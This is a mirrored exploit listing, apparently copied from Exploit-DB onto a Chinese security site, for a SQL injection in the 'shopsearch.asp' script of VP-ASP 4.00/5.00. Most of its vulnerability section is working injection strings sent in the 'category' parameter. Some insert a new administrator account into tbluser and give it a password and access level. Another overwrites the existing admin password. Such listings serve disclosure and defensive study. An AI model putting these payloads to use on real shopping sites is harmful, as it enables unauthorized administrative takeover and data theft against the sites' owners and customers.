Virtual Programming VP-ASP 4.00/5.00 – ‘shopsearch.asp’ SQL Injection

Virtual Programming VP-ASP 4.00/5.00 – ‘shopsearch.asp’ SQL Injection

漏洞ID 1054274 漏洞类型
发布时间 2003-12-01 更新时间 2003-12-01
图片[1]-Virtual Programming VP-ASP 4.00/5.00 – ‘shopsearch.asp’ SQL Injection-安全小百科CVE编号 N/A
图片[2]-Virtual Programming VP-ASP 4.00/5.00 – ‘shopsearch.asp’ SQL Injection-安全小百科CNNVD-ID N/A
漏洞平台 ASP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23407
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9133/info

It has been reported that VP-ASP may be prone to a SQL injection vulnerability that may allow an attacker to disclose sensitive information by supplying malicious SQL code to the underlying database. The problem exists in the 'shopsearch.asp' script of the software. 

This code creates a new administrative account:
Keyword=&category=5); insert into tbluser (fldusername) values
('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6

This code changes the administrator password:
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

相关推荐: Oracle Database Server OracleO Binary Local Buffer Overflow Vulnerability

Oracle Database Server OracleO Binary Local Buffer Overflow Vulnerability 漏洞ID 1099437 漏洞类型 Boundary Condition Error 发布时间 2003-10-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享